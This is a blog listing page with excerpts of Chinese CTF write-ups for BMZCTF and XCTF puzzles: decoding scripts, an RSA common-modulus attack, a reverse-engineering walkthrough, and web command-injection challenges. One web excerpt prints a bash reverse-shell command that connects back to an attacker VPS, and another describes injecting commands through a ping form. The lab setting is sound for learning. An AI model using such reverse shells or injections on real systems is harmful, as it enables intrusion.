- 博客(13)
- 收藏
- 关注
原创 BMZCTF-神秘压缩包
下载附件,里面有两个文件:wenjian.rar和压缩包密码.txt打开压缩包密码后,发现是base64编码。前缀是data:image/png;应该是将PNG图片内容用base64编码了,写脚本还原:import base64with open(r'C:\题目\压缩包密码.txt','r') as f : tmp=f.read() tmp = tmp.split('base64,')[1] tmp = base64.b64decode(tmp)with open (r.
2021-06-17 22:41:03 1384
原创 BMZCTF-海量的txt文件
下载附件,打开后是500个txt文件:打开后都是乱码,看不出什么,直接写脚本,找flag:for i in range(1,501,1): with open(r'C:\Users\Crazy\Desktop\flag\{}.txt'.format(i),'r') as f : for tmp in f: if "flag" in tmp : print (tmp)可惜没找到。换个关键字key{试试:for i i.
2021-06-17 22:28:29 873
原创 BMZCTF-端午彩蛋-纪念屈原
rar下载附件,查看文件头部,是一个rar的压缩包。改后缀解压,需要密码,看到压缩包提示:屈原的姓、氏、名、字分别为哪四个字?拼接起来md5加密后即为解压密码查看百度:屈原(约公元前340—公元前278年),芈姓,屈氏,名平,字原,组合芈屈平原,写脚本进行md5编码:import hashlibs1 = '芈屈平原'.encode('utf-8')x=hashlib.md5(s1).hexdigest()print(x)得到密码:16ccb09f96f27af192f541992560
2021-06-16 10:43:28 573
原创 BMZCTF WEB easy_exec
打开页面:显示:no file查看源码:发现新的页面de.php,打开:可以看到源码要我们输入两个参数,最后与file拼接,再执行。知道原理后,开始分析代码:<?phphighlight_file(__FILE__);$comm1 = $_GET['comm1']; #输入第一个参数$comm2 = $_GET['comm2']; #输入第二个参数if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|.
2021-01-25 18:37:58 684 1
原创 BMZCTF WEB shell_exec
打开页面发现是个ping的页面:尝试了几个命令执行的方法,均无返回结果:查看源代码:发现了下面的命令:ping -c 2 "$_POST[ip]" 2>&1后面的2>&1的意思是:标准错误重定向到标准输出。也就是说我们在网页的输入,当遇错时,结果会被输出到一个地方,而我们没有指定,所以看不到。知道原理了,那么我们开始构造payload:1、要程序运行错误;2、要指定输出位置。由于页面带过滤,经过多次尝试:发现#以下被过滤cattaclessm.
2021-01-25 11:13:37 426
原创 BMZCTF WEB WEB_penetration
打开网页:发现过滤了很多字母和字符:b,d,e,-,q,f,g,i,p,j,+,k,m,n,<,>,o,w,x,~,:,^,@,&,,%,",*,(,),!,=,.,[,],},{,_);致使我们好多命令都无法操作。最后观察至curl没有被过滤。我们就可以设置好VPS,使用VPS反弹shell设置VPS的首页为:bash -c "bash -i >& /dev/tcp/IP地址/5555 0>&1"在VPS上打开web服务,如果没有ap.
2021-01-25 09:06:22 690
原创 2021 XCTF Guesskey
Guess key下载附件,是一段代码,分析如下:from random import randintimport osfrom flag import flagN=64key=randint(0,2**N) # 0到2的64次方中随机取一整数print keykey=bin(key)[2:].rjust(N,'0') # key取二进制,只取64位,左侧补0count=0while True: p=0 q=0 new_key='' zeros=[0] for j in r
2021-01-19 20:49:58 486
原创 XCTF PUZZLE
PUZZLE下载附件是一张图片,可以正常打开但图片被分成一小片一小片的,而且随机摆放,但可以看出来,在原来的图片上写上了文件,猜测flag就应该是上面的文字。使用gaps对图片进行拼图。发现拼不出来。天空中的大字有flag、what’s、not、ing等,下面的花丛里有“{”。所以flag应该在在下的花丛里。只好手动拼接。用脚本将图片分割:import osfrom PIL import Imagedef splitimage(src, rownum, colnum, dstpath
2021-01-19 20:48:20 197
原创 BMZCTF Re
baby_reverse下载附件,是一个没有后缀的文件,用文本编辑器打开,发现里面是16进制的编码flag的16进制编码是666c6167,在文件中查找,发现一长串,进行16进制密码后得到flag山东省大学生网络技术大赛-cm50Pe查看文件,是C++编写的32位可执行文件,放入ollydubg进行调试,全局搜索字符串,看到关键字:U r right!\n\n定位,并向上查找pub ebp逐步运行,并在输入时,随意输入 ,发现在会显示出flag我们此设断点,运行,得到:flag{
2021-01-07 08:40:49 696
原创 BMZCTF Crypto
2018 HEBTUCTF Sudoku&Viginere下载附件,为一个doc文件,打开后发现是一个数独游戏,和一个密码。完成数独后:看数独表很像Viginere的密码表,根据45 34 57 74 15 35 26 86 47 39,在密码表上选取:密文 先横后竖 先竖后横45 r 134 r 557 y _74 5 115 5 t35
2021-01-07 08:37:57 1276
原创 BMZCTF MISC(二)
SDNISC2020_RSA下载附件,为一个文本文件。其内容为可以得知:n,c1,e1,c2,e2。为典型的RSA的共模攻击。使用脚本:n = 0xa1d4d377001f1b8d5b2740514ce699b49dc8a02f12df9a960e80e2a6ee13b7a97d9f508721e3dd7a6842c24ab25ab87d1132358de7c6c4cee3fb3ec9b7fd873626bd0251d16912de1f0f1a2bba52b082339113ad1a262121d
2021-01-07 08:32:43 554 1
原创 BMZCTF-MISC(一) WriteUp
文章目录MISC0x01 签到题0x02 2018 HEBTUCTF 签到题0x03 2018 HEBTUCTF 你可能需要一个wireshark2018 护网杯 迟来的签到题MISChttp://www.bmzclub.cn/challenges解密0x01 签到题关注公众号:白帽子社区,回复关键字:BMZCTF 获取flag0x02 2018 HEBTUCTF 签到题下载压缩包。是个名为zip的文件,没有后缀名。用010editor打开,看下文件头部:发现是个压缩包,添加后缀.zi
2020-11-15 23:21:56 997
原创 BMZCTF-Web WriteUp
Web 题hctf_2018_warmup打开后是一张图片。查看源码发现source.php访问,得到一串代码:<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.
2020-11-15 23:21:16 1396 1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人